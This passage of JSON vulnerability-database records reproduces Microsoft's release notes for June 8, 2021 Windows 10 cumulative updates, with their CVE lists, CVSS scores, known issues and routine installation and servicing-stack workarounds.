"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003638", "href": "https://support.microsoft.com/en-us/help/5003638", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T09:54:30", "description": "None\n**EXPIRATION NOTICE****IMPORTAN**T As of 9/12/2023, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates for storing and managing files.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows HTML Platform, and Windows Storage and Filesystems.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied\n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \n \n## How to get this update\n\nThis update is no longer available.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003687 (OS Build 10240.18967) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003687", "href": "https://support.microsoft.com/en-us/help/5003687", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T09:54:24", "description": "None\n**5/11/21 \nREMINDER **Windows 10, version 1809 reached end of service on May 11, 2021 for devices running the Enterprise, Education, and IoT Enterprise editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise G, HoloLens, and the LTSC editions for Client, Server, and IoT.\n\n**5/11/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in April 2021. In the May 11, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.1999) released June 8, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates for storing and managing files.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue with an inconsistent shutdown during Windows Update that damages the Windows Management Instrumentation (WMI) repository. As a result, the Managed Object Format (MOF) Advance Installer fails.\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows Kernel, Windows HTML Platform, and Windows Storage and Filesystem.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| This issue is addressed by updates released June 11, 2019 and later. We recommend you install the latest security updates for your device. Customers installing Windows Server 2019 using media should install the latest [Servicing Stack Update (SSU)](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) before installing the language pack or other optional components. If using the [Volume Licensing Service Center (VLSC)](<https://www.microsoft.com/licensing/servicecenter/default.aspx>), acquire the latest Windows Server 2019 media available. The proper order of installation is as follows:\n\n 1. Install the latest prerequisite SSU, currently [KB5005112](<https://support.microsoft.com/help/5005112>)\n 2. Install optional components or language packs\n 3. Install latest cumulative update\n**Note** Updating your device will prevent this issue, but will have no effect on devices already affected by this issue. If this issue is present in your device, you will need to use the workaround steps to repair it.**Workaround:**\n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/windows/manage-the-input-and-display-language-settings-in-windows-12a10cb4-8626-9b77-0ccb-5013e0c7c7a2>).\n 2. Click **Check for Updates **and install the April 2019 Cumulative Update or later. For instructions, see [Update Windows 10](<https://support.microsoft.com/windows/update-windows-3c5ae7fc-9fb6-9af1-1984-b5e0412c556a>).\n**Note **If reinstalling the language pack does not mitigate the issue, use the In-Place-Upgrade feature. For guidance, see [How to do an in-place upgrade on Windows](<https://docs.microsoft.com/troubleshoot/windows-server/deployment/repair-or-in-place-upgrade>), and [Perform an in-place upgrade of Windows Server](<https://docs.microsoft.com/windows-server/get-started/perform-in-place-upgrade>). \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied\n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code. \n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **&gt; **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the May 11, 2021 servicing stack update (SSU) (KB5003243) or the latest SSU (KB5003711) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003646>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5003646](<https://download.microsoft.com/download/2/8/4/284e4a44-b568-4fe4-9a6d-27219e92e454/5003646.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003646 (OS Build 17763.1999)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003646", "href": "https://support.microsoft.com/en-us/help/5003646", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T09:54:23", "description": "None\n**EXPIRATION NOTICE**As of 9/12/2023, KB5003635 is only available from Windows Update. This update is no longer available from the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n--- \n \n**5/11/21** \n**REMINDER **Windows 10, version 1909 reached end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**4/13/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in March 2021. In the April 13, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 18363.1116) released June 8, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates for storing and managing files.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates an issue that might prevent you from signing in to some Microsoft 365 desktop client apps after installing the May 11, 2021 or later update and restarting your device.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue with an inconsistent shutdown during Windows Update that damages the Windows Management Instrumentation (WMI) repository. As a result, the Managed Object Format (MOF) Advance Installer fails.\n * Addresses an issue that might prevent you from signing in to some Microsoft 365 desktop client apps after installing the May 11, 2021 or later update and restarting your device. You might also receive an 80080300 error or \"We ran into a problem. Reconnecting\u2026\" when attempting to authenticate or sign in to Teams.\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows Kernel, Windows HTML Platform, and Windows Storage and Filesystem.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied \n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing this update or later, the news and interests button in the Windows taskbar might have blurry text on certain display configurations.| This issue is resolved in KB5003698. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the April 13, 2021 servicing stack update (SSU) (KB5001406) or the latest SSU (KB5003710) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| No| No longer available. \nMicrosoft Update Catalog| No| No longer available. \nWindows Server Update Services (WSUS)| No| No longer available. \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5003635](<https://download.microsoft.com/download/3/b/a/3babb75d-f970-4ed1-ba97-b69bc52e4049/5003635.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003635 (OS Build 18363.1621)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003635", "href": "https://support.microsoft.com/en-us/help/5003635", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T09:54:24", "description": "None\n**EXPIRATION NOTICE****IMPORTAN**T As of 9/12/2023, this KB is only available from Windows Update. It is no longer available from the Microsoft Update Catalog or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**4/13/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in March 2021. In the April 13, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>).**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates to improve security when Windows performs basic operations.\n * Updates for storing and managing files.\n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10 servicing stack update - 19041.1022, 19042.1022, and 19043.1022 \n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1154) released June 8, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows Kernel, Windows HTML Platform, and Windows Storage and Filesystems.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nA small subset of users have reported lower than expected performance in games after installing this update. Most users affected by this issue are running games full screen or borderless windowed modes and using two or more monitors.| This issue is resolved in KB5003690. \nAfter installing this update, 5.1 Dolby Digital audio may play containing a high-pitched noise or squeak in certain apps when using certain audio devices and Windows settings.**Note **This issue does not occur when stereo is used.| This issue is resolved in KB5003690. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab &lt;destination path&gt;**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* &lt;destination path&gt;**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied\n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing this update or later, the news and interests button in the Windows taskbar might have blurry text on certain display configurations.| This issue is resolved in KB5003690. \nAfter installing this update, Internet Explorer 11 (IE11) or apps using the 64-bit version of the WebBrowser control might fail to open PDFs or may render as just a gray background using the Adobe Acrobat plug-in.**Note **Internet Explorer is only affected if **Enable 64-bit Processes for Enhanced Protected Mode** is enabled in the **Advanced** tab in **Internet Options**.| This issue is resolved in KB5004760. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| No| No longer available. \nMicrosoft Update Catalog| No| No longer available. \nWindows Server Update Services (WSUS)| No| No longer available. \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5003637](<https://download.microsoft.com/download/6/a/0/6a0b9a84-d94b-426b-926f-2be0af9901b6/5003637.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1022, 19042.1022, and 